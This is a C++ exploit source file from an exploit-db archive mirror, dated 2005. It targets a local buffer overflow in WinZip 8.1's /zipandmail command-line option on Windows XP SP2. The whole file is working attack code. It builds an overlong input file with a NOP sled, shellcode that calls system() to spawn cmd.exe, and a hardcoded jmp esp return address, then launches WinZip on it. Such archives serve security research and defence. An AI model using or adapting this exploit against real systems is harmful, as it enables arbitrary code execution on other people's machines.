exploit-db-mirror/platforms/windows/local/1034.cpp

/*
*
* WinZip Command Line Local Buffer Overflow
* http://securitytracker.com/alerts/2004/Sep/1011132.html
* http://www.winzip.com/wz90sr1.htm
* Exploit coded By ATmaCA
* Web: atmacasoft.com && spyinstructors.com
* E-Mail: atmaca@icqmail.com
* Credit to kozan
*
*/

/*
*
* Tested with WinZip 8.1 on Win XP Sp2 En
* Bug Fixed on WinZip 9.0 Service Release 1 (SR-1)
* http://www.winzip.com/wz90sr1.htm
*
*/

#include <windows.h>
#include <stdio.h>

#define NOP 0x90

void main()
{
        // create crafted command line
        char tmpfile[] = "c:\\wzs45.tmp";
        char winzippath[] = "C:\\Program Files\\WINZIP\\winzip32.exe";
        char zipandmailpar[] = " -* /zipandmail /@  ";
        char runpar[300];
        int i = 0;
        strcpy(runpar,winzippath);
        strcat(runpar,zipandmailpar);
        strcat(runpar,tmpfile);

        // need for some input file name .tmp but not must to exist
        char inputfile[] = "C:\\someinputfile.ext\n";

        // launch a local cmd.exe
        char shellcode[] =
        "\x55\x8B\xEC\x33\xFF"
        "\x57\x83\xEC\x04\xC6\x45\xF8"
        "\x63\xC6\x45\xF9\x6D\xC6\x45"
        "\xFA\x64\xC6\x45\xFB\x2E\xC6"
        "\x45\xFC\x65\xC6\x45\xFD\x78"
        "\xC6\x45\xFE\x65\xB8"
        "\xC7\x93\xC2\x77" //77C293C7 system() - WinXP SP2 - msvcrt.dll
        "\x50\x8D\x45\xF8\x50"
        "\xFF\x55\xF4";

        // create crafted .tmp file
        FILE *di;
        if( (di=fopen(tmpfile,"wb")) == NULL ){
                return;
        }

        for(i=0;i<sizeof(inputfile)-1;i++)
                fputc(inputfile[i],di);

        fprintf(di,"c:\\");

        for(i=0;i<384;i++)
                fputc(NOP,di);


        for(i=0;i<sizeof(shellcode)-1;i++)
                fputc(shellcode[i],di);

        fprintf(di,"\xBF\xAC\xDA\x77");  //EIP - WinXp Sp2 Eng - jmp esp addr
        fprintf(di,"\x90\x90\x90\x90");  //NOPs
        fprintf(di,"\x90\x83\xEC\x74");  //sub esp,0x74
        fprintf(di,"\xFF\xE4\x90\x90");  //jmp esp

        fprintf(di,"\n");

        fclose(di);
        WinExec(runpar,SW_SHOW);
}

// milw0rm.com [2005-06-07]